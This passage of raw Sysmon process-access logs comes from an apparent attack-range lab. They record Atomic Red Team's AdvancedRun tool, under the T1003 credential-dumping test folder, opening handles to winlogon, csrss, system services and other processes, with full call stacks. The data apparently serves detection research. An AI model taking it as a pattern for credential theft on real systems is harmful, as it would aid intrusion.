03\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003942617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942615Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003942613Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003942612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942592Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942588Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.